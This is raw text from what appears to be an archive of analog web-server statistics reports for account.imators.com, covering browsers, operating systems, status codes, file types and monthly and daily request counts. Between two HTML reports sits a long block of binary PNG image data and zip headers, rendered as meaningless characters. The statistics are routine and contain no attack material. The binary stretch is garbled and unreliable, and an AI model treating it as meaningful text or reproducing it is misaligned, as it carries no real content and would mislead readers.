class="P">1</td><td class="xl">Mozilla/5.0 (Linux; Android 9; LEX829) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/10.1 Chrome/71.0.3578.99 Mobile Safari/537.36</td></tr> <tr><td class="R">32</td><td class="P">0</td><td class="xl">[not listed: 7 browsers]</td></tr> </tbody></table> </div><div class="browsum"><h2><a name="browsum" id="browsum">Browser Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | Browser Summary | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browsum.png" alt="" /></p> <p class="whatinc"> Listing browsers with at least 1 request for a page, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">81</td><td class="P">67</td><td class="xl">Netscape (compatible)</td></tr> <tr><td class="N">2</td><td class="R">157</td><td class="P">65</td><td class="xl">Safari</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">144</td><td class="P">60</td><td class="xl"> Safari/537</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">11</td><td class="P">3</td><td class="xl"> Safari/604</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">2</td><td class="P">2</td><td class="xl"> Safari/535</td></tr> <tr><td class="N">3</td><td class="R">7</td><td class="P">7</td><td class="xl">Go-http-client</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">7</td><td class="P">7</td><td class="xl"> Go-http-client/1</td></tr> <tr><td class="N">4</td><td class="R">6</td><td class="P">6</td><td class="xl">Firefox</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">4</td><td class="P">4</td><td class="xl"> Firefox/65</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/130</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> Firefox/24</td></tr> <tr><td class="N">5</td><td class="R">3</td><td class="P">1</td><td class="xl">Mozilla</td></tr> <tr><td class="N">6</td><td class="R">1</td><td class="P">1</td><td class="xl">python-requests</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">1</td><td class="P">1</td><td class="xl"> python-requests/2</td></tr> <tr><td class="N"> </td><td class="R">15</td><td class="P">0</td><td class="xl">[not listed: 3 browsers]</td></tr> </tbody></table> </div><div class="os"><h2><a name="os" id="os">Operating System Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | Operating System Report | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./os.png" alt="" /></p> <p class="whatinc"> Listing operating systems, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="N"> #</th><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">OS</th></tr></thead> <tbody><tr><td class="N">1</td><td class="R">103</td><td class="P">75</td><td class="xl">OS unknown</td></tr> <tr><td class="N">2</td><td class="R">99</td><td class="P">38</td><td class="xl">Windows</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">87</td><td class="P">34</td><td class="xl"> Windows NT</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">12</td><td class="P">4</td><td class="xl"> Unknown Windows</td></tr> <tr><td class="N">3</td><td class="R">46</td><td class="P">25</td><td class="xl">Unix</td></tr> <tr class="sub level2"><td class="N"> </td><td class="R">46</td><td class="P">25</td><td class="xl"> Linux</td></tr> <tr><td class="N">4</td><td class="R">22</td><td class="P">9</td><td class="xl">Macintosh</td></tr> </tbody></table> </div><div class="code"><h2><a name="code" id="code">Status Code Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | Status Code Report | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./code.png" alt="" /></p> <p class="whatinc"> Listing status codes, sorted numerically.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">status code</th></tr></thead> <tbody><tr><td class="R">289</td><td class="xl">200 OK</td></tr> <tr><td class="R">47</td><td class="xl">403 Access forbidden</td></tr> <tr><td class="R">213</td><td class="xl">404 Document not found</td></tr> </tbody></table> </div><div class="size"><h2><a name="size" id="size">File Size Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | File Size Report | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./size.png" alt="" /></p> <table> <thead><tr><th class="x">size</th><th class="R">#reqs</th><th class="b">%bytes</th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 1B- 10B</td><td class="R">0</td><td class="b"> </td></tr> <tr><td class="x"> 11B- 100B</td><td class="R">20</td><td class="b"> 0.66%</td></tr> <tr><td class="x"> 101B- 1kB</td><td class="R">182</td><td class="b">40.88%</td></tr> <tr><td class="x"> 1kB- 10kB</td><td class="R">87</td><td class="b">58.46%</td></tr> </tbody></table> </div><div class="type"><h2><a name="type" id="type">File Type Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | File Type Report | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./type.png" alt="" /></p> <p class="whatinc"> Listing extensions with at least 0.1% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">extension</th></tr></thead> <tbody><tr><td class="R">166</td><td class="b">51.58%</td><td class="xl">[directories]</td></tr> <tr><td class="R">63</td><td class="b">33.87%</td><td class="xl">.js [JavaScript code]</td></tr> <tr><td class="R">20</td><td class="b">10.55%</td><td class="xl">.css [Cascading Style Sheets]</td></tr> <tr><td class="R">20</td><td class="b"> 3.34%</td><td class="xl">.svg</td></tr> <tr><td class="R">20</td><td class="b"> 0.66%</td><td class="xl">[no extension]</td></tr> </tbody></table> </div><div class="dir"><h2><a name="dir" id="dir">Directory Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | Directory Report | <a href="#req">Request Report</a>)</p> <p><img src="./dir.png" alt="" /></p> <p class="whatinc"> Listing directories with at least 0.01% of the traffic, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">directory</th></tr></thead> <tbody><tr><td class="R">166</td><td class="b">51.58%</td><td class="xl">[root directory]</td></tr> <tr><td class="R">103</td><td class="b">47.76%</td><td class="xl">/_autoindex/</td></tr> <tr><td class="R">20</td><td class="b"> 0.66%</td><td class="xl">/.well-known/</td></tr> </tbody></table> </div><div class="req"><h2><a name="req" id="req">Request Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | Request Report)</p> <p><img src="./req.png" alt="" /></p> <p class="whatinc"> Listing files with at least 20 requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="D">last time</th><th class="xl">file</th></tr></thead> <tbody><tr><td class="R">166</td><td class="b">51.58%</td><td class="D">Apr/27/25 10:15 PM</td><td class="xl"><a href="/">/</a></td></tr> <tr class="sub level2"><td class="R">25</td><td class="b"> 8.46%</td><td class="D">Feb/15/25 2:11 PM</td><td class="xl"> <a href="/?54.202.183.123">/?54.202.183.123</a></td></tr> <tr><td class="R">32</td><td class="b"> 4.68%</td><td class="D">Mar/26/25 5:50 AM</td><td class="xl">/_autoindex/assets/js/tablesort.number.js</td></tr> <tr><td class="R">31</td><td class="b">29.19%</td><td class="D">Mar/15/25 12:03 AM</td><td class="xl">/_autoindex/assets/js/tablesort.js</td></tr> <tr><td class="R">20</td><td class="b"> 3.34%</td><td class="D">Mar/ 6/25 12:48 AM</td><td class="xl">/_autoindex/assets/icons/folder-fill.svg</td></tr> <tr><td class="R">20</td><td class="b">10.55%</td><td class="D">Mar/ 6/25 12:48 AM</td><td class="xl">/_autoindex/assets/css/autoindex.css</td></tr> <tr><td class="R">20</td><td class="b"> 0.66%</td><td class="D">Mar/ 5/25 4:32 PM</td><td class="xl">[not listed: 9 files]</td></tr> </tbody></table> </div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>. <br /><span class="runtimetitle">Running time:</span> Less than 1 second. </p> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> </div> </body> </html> PK J�[��8� � browrep.pngnu �[��� �PNG IHDR X �wt� *PLTE��� ������ � � �� � � ��� ��� ��� �z� *IDATx�흽r�ǁ7 x%ߗXe� Tz�J��ۉb_�����23UdŗX��лx��@7>��w8-���|��z����aL{-^�K��o����p)��F�9�Ŵ��7�0��XJ�0y���k�Xv��ր��5`�;` �k�Xv��ր��5`�;` �k�·%�]˓�3`I�̟}eO�����ګwδ3/�e����{�wu-�%*k��Z K^��T`�ԵgZ�4e��ڵ/��� ���MmV�EX�����`�.X��v�q~V�X'\�^�7�X�Ī��.�� ��Va�ۣ'�a}�k��ȆU���z"V��Ѓ��V�U��>LX��Մ� [��_ί�ƃU XmX��a)/C*�cM�T�����U"�O�����[5S�,X��Ձ�[%X*���)Ix+���g�L ��Zyq����Ū ��",�������",\{Z ���f� %ذ�������Z��N��NX��M��>m4�䩤}���L��oX�����ZX�(����6��Hw�j�.�n�"����l���M1_�EE����{�#+�m��m��lXM'���-�H}̧��� X"���JyV[!X�˥�g����R�a�����),Wy�D�� ���Re��a� cyRX �TAo��:N؇�q�����x7n�]pI�P'U7��p��G��T�x�$��2`������u�ps���[������J�b� {�ŽV~� Ih��B�S��2n����� �.%mpT�)X��Ł�R�f��9TXV"GV7bq`�&YӁ�uB��$kڰ�b��Iִ �!,��Hk#X��uk��Tn�5a�o�3a1�Y��l����k��&S訇{�Ds(��m��D,f̺��*�"��4���5�5lO���^����K y0��Dg�' ��-X'�zq{[����Ϫ)+�R���� �σ{~�r�2[�z{ˁ��g�Ā��ܓ��J�9���ПB@OH@>K�I��va��$��_8�|n ���v'�|�����I`���R�JC�Y�{���x�b��HEZ$fᴀ��M(�{r��,wD�f���[�D��.TH;��؋YLa�a��<j�Ja��Y,_9�p�İ܉B6&��@��C���ǻ��)�xS�X�<% X2n;&���T����[oe?$�8�,WL9�Ѧ�2�P�J�~ �V(��Y� %J~��G:�,����^ ���x-�ڽ�Q7�T��С�V��U�^�Uaq��+��Ժ��b��%kdu��Z� �텝���.�+���j�zA`������֯�[�����gMAff�y�X|/l���M��%X��4:>kMW/�VVAZ���ښ�2a�aM����a xaV&��X�|V{|օ�ʅՁ5e|օ�*����Y�Ǭ��U��S`UZ)�n>+�ay|��F�U�UVAZ�㳶og̀UVV�Jzپ�T�5�5Xea��L��.�����J�*N�CXC!��℥�uA����vk���������?6��� ����X�,�]�W5�ZR����_U���!,�z>K�Fg�vǕ�M6��!���� ��BVVKXYЊ�8�,Ây9hPZK�L�7��V'�eGv���|V�;�L6�3R,H��aG i�`��Մ��g�� �G �;��K@�؇R`��g�t��K�CEZS�CV�-�4h����gia��&��*�a���l�`�ˈ,O3ZVGX=X�|U�S��(;�J� ��ӅU�Y�^�-c�V�)�v>�,�Z*�O��^��ɆZ��7���hgo��`uY�`u�Y��L�a.Z�*O6�a��o��c}�xi�ٰzNղR��S�S��e�o@��lX}a��;d��v�n�&u��dXa]pW:�5z3��º��\Xa��u�� vo��Vz�e�F�;����zO"|���g�w�i��e�o$��� π��/Z�o ��H+�0���6,[fI��X���Q��"j3,���ut���7`1�gI�v}P� $)��])��@ɯ�|�尚���Z���$z�u_|�Ea������Z:�p1�f�DՁ��� m�A�9��,�~���Q��4����7�Xuai���W`��ge��3 �ۚ�!��D�)�p��bX5aa������b�e���|�Ű��JEՇ�U�g �����KJ����{7�F*L>95VIXQu`1���ݢôr4K3Y� �ů�[�3�.���(��������p��[���+VMT9�K�I�^0Eu�Jf�Du�����X� ��:`��_ �Gc�ڼދl�\�kÒ�Q����Z��6��Q�`Şʎ�� �ѵ�����DՆ�+\����|�����347�Q��9˧���(!�w�|�I���@74O��UW�������+�8-!.�ݯ#�j�$� ��B(��GTŬ�E�R��n�W=��a)���B��ł��U Ha����9�-�|X7'��,-�z;+����0~J���O�Kˏ?��wwL^�|�Ķ����ӏ?��Z=^���4:6��LJ�����Z��w�o����Ǐ�D��u� ��K��N�:��{�Z��5��?�t�� [$pUy=sX�?���`��!��̋��d��[W{�M����ߌ�l��WΫ�9>�h���Qŗx[�9?Ty�XX'iٰU \ �.,�:\?+3:Nd�D�:��Q4��OFZ.l�E.%�Zi�,<"�U��6����ra��� �5�o(��|����C?x@���й*���2��a����aq�g���Yue%�2<� �v�8�N����3`}}i��Hˇ�6��)�ge�C!N����.u��u�M��z�ꁫ �;>�R�� V�Eg B (*KX嘵 �����C+-[�0�+�K �Ԃ���� ���K���������a�\X'?�� a����_?��O�U����٣dw��9���AZ!l�W V�*���dx5֪m��a�f��S�,,�����+��R�s�ƾ���2~��V1p͂��M�e#|� [��u�P�*���C/-�Y����ۡ����1 \�f(~3��M��f�z��� �K�8" \UX�C����9�0N$���S�%[ڮ�6��_��2A������Wr�),܆��;��]7K���yL��`�����c΄E�E�\C�J�&]�>,Y��o����i��zi%a+���;��$ᗸҒ�h�_����J����=, �C朠4�KN�c������#��C�V� p%!�J�b �TX���E�MB��6*�W Gw�w��HD� ��u�:Q"Kf�cN�����Ҳ���_+���W�x#,�� ��r��J�:�R�D�|*L�r���`i%a��&������TY�W�˳p��(���w 9��,l��Ձ�QV ����b� �(� � ��� �� &��ka�O�0['Z�}( �d~J67�ø��Vɟ�D!�9,�/���?���]�,���5������ ��Z�HY���)���[�`!?������ڟeLX�f}e�q�TZY�&�f�$X&�#?��J���` Gx�!�V�.7?#*�F���B�z؍�f��AI�������Meϵ"�Q?��#|.-�r/���:>�JwZݦ�r�R�XZ(l�`�V���*d`V����X�X�)V���ʰ�� VZiőH� e1�g��T�2����a�> �K�V�FVH#��|�In-�N�˽�3·~H���Vc|�R�c��W� �1?X.h��Pke����`�^,�` >��+�� �Hˆ�R�RX!qD�Bj �4(!EV�Zۦ�J��H˄�.��,ȑ���#+�/)V��1?�&���z������I���<�j�Ƥ�?��z�S�e_&�9�,X(�?��x�cUXC~��*K�a��M�*�!i�4hi]��ց������$��U�¯��j�Yֈ��{�X��� 'Xm|�X�U��a�� �F>+=+'��?9��^|րf�ri���J� '��{Z��e`�a��jN����|C�e�`�!�M�(��D:Q��قŗV�����v#����F�j�Lh��&̅���4:��Nd#⚰RiU�($fu�Y�� #�L�`DiU��i���݉�`�zV���������B��# AqcV7fE"<�C#��m=���g�F�|C����B��G��P�D��ц�uD���n!�5}���� ��h/� H�1�BN8V���G���.��� �J �U:5 Xl?��`a?|\�q�}_��+��,�ci}�t�\�����7�Ϫփ�tD+�����x���9�u����fe�+��vIJ��yn�ֲ.,^�*������`�ӵ>,V�*�̉XV�<Yc��8�m���3�ٰ3XG,²���.��ҐuRO�iƁ�pD�a��*KC�iJ����Ҫ��W9wC�Tz�Ƃ�[�����T�ufx=�ꆭ2�όH`�)�OИ�za��3����+[���S4.�N�"� h�ja=}��ꅭ�<�?ɻ�YƆ� [�n��0�����m�.�� �jz"�u��������k�w�bV� �/{�A1 �ނ ���j֩��w���ª��k��Վv�j ��+�/{uAc`�\1�Ek�gwmmK` 3�� �{�����+ k�2���FcW�����Ӯ��������5`�;` �k�Xv��ր��5`�KaI���q���f����٤���Y�V˫ׄ��慿��K�gԷlnOV�ȪW`s+�2��{i^�'I(�s2�bma�����v�s�Ke��KJ��gJ�;�(,,(/Õ�w7�,����L~��W,�)'"���g,l_sGSPҡTٹ���Qy�^�vVt�S�@���^�-.��;�/��r�H`�� n#�m��ނΥD��+a֯՝&׳�U`���bA_B����9ȕ%,?��)K`%� S�����j�l��e|�"����P��� I���n�a���� , �l�eXYC̖(�[� �v�� �^:R��9�>H�� 1��cZV�8��P]϶1�7i�� 6>ץzg��GV�����T>�֥.��Y��o4��}C���5`�;` �k�Xv��ր��5`�;` �k�X�`��Xf`��L"<,����g�>[{u#a��j����^�r��#�Ce IEND�B`�PK J�[���eL� L� 12.htmlnu �[��� <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for account.imators.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://account.imators.com/">account.imators.com</a></h1> <p class="analysisspan">Program started on Fri, Dec 05 2025 at 12:09 PM. <br />Analyzed requests from Sun, Nov 03 2024 at 3:43 PM to Fri, Dec 05 2025 at 1:04 AM (396.39 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Dec 05 2025 at 12:09 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 896 (2) <br /><span class="gensumtitle">Average successful requests per day:</span> 2 (0) <br /><span class="gensumtitle">Successful requests for pages:</span> 592 (2) <br /><span class="gensumtitle">Average successful requests for pages per day:</span> 1 (0) <br /><span class="gensumtitle">Failed requests:</span> 5,346 (152) <br /><span class="gensumtitle">Redirected requests:</span> 19 (0) <br /><span class="gensumtitle">Distinct files requested:</span> 71 (1,912) <br /><span class="gensumtitle">Distinct hosts served:</span> 455 (637) <br /><span class="gensumtitle">Data transferred:</span> 1.10 megabytes (628 bytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 2.85 kilobytes (89 bytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 2 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Nov 2024</td><td class="R">130</td><td class="P">60</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Dec 2024</td><td class="R">16</td><td class="P">14</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> </td><td class="R"> </td><td class="P"> </td><td class="bar"> </td></tr> <tr><td class="x">Jan 2025</td><td class="R">55</td><td class="P">29</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Feb 2025</td><td class="R">12</td><td class="P">12</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Mar 2025</td><td class="R">60</td><td class="P">35</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Apr 2025</td><td class="R">16</td><td class="P">16</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">May 2025</td><td class="R">107</td><td class="P">70</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Jun 2025</td><td class="R">71</td><td class="P">39</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Jul 2025</td><td class="R">83</td><td class="P">70</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Aug 2025</td><td class="R">115</td><td class="P">65</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Sep 2025</td><td class="R">90</td><td class="P">76</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Oct 2025</td><td class="R">73</td><td class="P">54</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Nov 2025</td><td class="R">68</td><td class="P">52</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> </tbody></table> <p class="busiesttime">Busiest month: Sep 2025 (76 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 3 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">137</td><td class="P">88</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Mon</td><td class="R">124</td><td class="P">73</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Tue</td><td class="R">148</td><td class="P">81</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Wed</td><td class="R">102</td><td class="P">74</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Thu</td><td class="R">119</td><td class="P">90</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Fri</td><td class="R">140</td><td class="P">111</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" 